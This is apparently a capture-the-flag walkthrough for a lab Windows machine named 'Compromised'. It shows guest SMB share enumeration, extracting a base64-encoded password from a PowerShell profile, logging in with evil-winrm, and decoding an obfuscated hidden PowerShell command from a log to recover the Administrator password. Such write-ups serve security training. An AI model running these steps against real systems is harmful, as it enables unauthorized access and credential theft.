Compromised

Enumeration

$ smbmap -u Guest -H 192.168.192.152
        Scripts$                                                READ ONLY
        Users$                                                  READ ONLY
        
$ smbclient \\\\192.168.192.152\\Scripts$ -U Guest
$ smbclient \\\\192.168.192.152\\Users$ -U Guest

Users: administrator, scripting

smb: \scripting\Documents\WindowsPowerShell\> get profile.ps1

This file contains base64 encoded password.

$password = ConvertTo-SecureString "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('[REDACTEDBASE64ENCODED]')))" -AsPlainText -Force

Initial Access

$ evil-winrm -u scripting -p [REDACTED] -i 192.168.192.152

PrivEsc

There is log file. We can see the base64 encoded string.

HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc JABPAHcAbgBlAGQAIAA9ACAAQAAoACkAOwAkAE8AdwBuAGUAZAAgACsAPQAgAHsAJABEAGUAYwBvAGQAZQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2A...

We should decode this long part.

They obfuscated it. We have to solve it.

We eliminated unnecessary parts of it. We broke down the script to:

$Decoded = [System.Convert]::FromBase64String("[REDACTEDBASE64ENCODED]")
$ms = (New-Object System.IO.MemoryStream($Decoded,0,$Decoded.Length))
(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).readtoend()

Execute these commands respectively. It will give the password.

$ evil-winrm -u Administrator -p [REDACTED] -i 192.168.192.152

PreviousAlgernon NextHelpdesk

Last updated 4 years ago

hashtagEnumeration

hashtagInitial Access

hashtagPrivEsc

Enumeration

Initial Access

PrivEsc